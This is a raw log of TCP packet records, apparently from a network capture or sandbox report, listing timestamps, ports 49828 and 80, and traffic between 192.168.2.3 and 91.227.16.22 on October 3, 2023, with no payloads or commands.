                                                                                                        Oct 3, 2023 18:02:38.205131054 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.205243111 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205318928 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205368996 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205368042 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.205425024 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205475092 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.205537081 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205648899 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205704927 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.205753088 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205842018 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205893040 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.205926895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205977917 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206028938 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.206048965 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206067085 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206118107 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.206135988 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206202984 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206254959 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.206283092 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206336975 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206384897 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206387043 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.206461906 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206515074 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.206552982 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206630945 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206681967 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.206707954 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206768990 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.206826925 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.425810099 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.425836086 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.425848961 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.425860882 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.425909996 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.425904036 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.425964117 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.425971985 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426007986 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426034927 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426074982 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426132917 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426134109 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426194906 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426238060 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426278114 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426342964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426383972 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426424980 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426482916 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426526070 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426557064 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426615953 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426667929 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426707983 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426798105 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426839113 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.426877975 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.426960945 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427004099 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.427057028 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427128077 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427169085 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.427237034 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427350998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427398920 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.427426100 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427489042 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427532911 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.427572012 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427658081 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427697897 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.427726984 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427808046 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427848101 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.427886963 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427932978 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.427980900 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.427993059 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428059101 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428100109 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.428153992 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428225040 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428263903 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.428308964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428391933 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428432941 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.428500891 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428608894 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428656101 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.428694010 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428769112 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428808928 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.428863049 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428953886 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.428993940 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.429032087 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.429126978 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.429166079 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.429223061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.429276943 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.429323912 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.429336071 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.429400921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.429441929 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.647681952 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648272038 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648283958 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648296118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648370028 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648421049 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.648421049 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.648479939 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648530006 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.648593903 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648668051 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648719072 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.648850918 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648905993 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.648952007 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.648991108 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649055958 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649096012 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.649286985 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649352074 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649398088 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.649436951 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649565935 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649614096 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.649763107 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649837971 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.649885893 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.650043964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.650557041 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.650605917 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.650688887 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.650743008 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.650799990 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.650840044 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.650882959 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.650928974 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.650940895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.650995016 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.651043892 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.651143074 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.651631117 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.651683092 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.651715040 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.651761055 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.651812077 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.651922941 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.651983023 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652028084 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.652122021 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652451992 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652501106 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.652546883 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652626991 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652682066 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.652724028 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652802944 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652856112 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.652865887 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652924061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.652971029 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.653069019 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653120995 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653166056 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.653283119 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653361082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653405905 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.653475046 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653559923 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653613091 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.653666019 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653829098 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653876066 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.653881073 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653945923 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.653991938 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.870645046 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.870676041 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.870688915 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.870780945 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.870847940 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.870879889 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.870886087 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.870970011 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871026039 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.871077061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871155024 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871213913 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.871239901 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871337891 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871414900 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871417046 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.871517897 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871594906 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.871603966 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871701002 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871764898 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.871790886 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871917963 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.871980906 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.872014999 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872081995 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872140884 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.872189999 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872266054 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872338057 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.872364998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872433901 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872494936 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.872509956 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872602940 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872664928 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.872680902 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872766018 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872828007 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.872864962 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.872946024 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873020887 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.873045921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873128891 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873188019 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.873224974 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873298883 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873358011 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.873385906 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873445034 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873544931 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.873558998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873629093 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873703957 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.873711109 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873817921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.873881102 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.873967886 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874330997 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874389887 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.874423027 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874519110 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874574900 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874582052 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.874654055 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874728918 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.874742031 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874818087 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.874880075 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.874916077 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875019073 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875076056 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875077963 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.875221014 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875284910 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.875298977 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875374079 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875432968 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.875451088 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875544071 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875602961 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.875634909 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875710964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875771046 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.875804901 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875861883 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.875922918 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.875966072 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876070023 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876131058 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.876141071 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876226902 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876290083 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.876322985 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876471996 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876487017 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876538992 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.876574039 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876632929 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.876635075 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876745939 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876806974 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.876836061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876916885 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.876976013 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.877012968 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877080917 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877140999 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.877192020 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877264023 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877324104 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.877372026 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877448082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877512932 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.877520084 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877604008 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877671957 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.877722025 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877820015 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877885103 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.877890110 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.877983093 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878047943 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.878076077 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878154993 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878221989 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.878238916 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878333092 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878410101 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.878420115 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878525019 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878590107 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.878618002 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878695965 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878761053 CEST4982880192.168.2.391.227.16.22
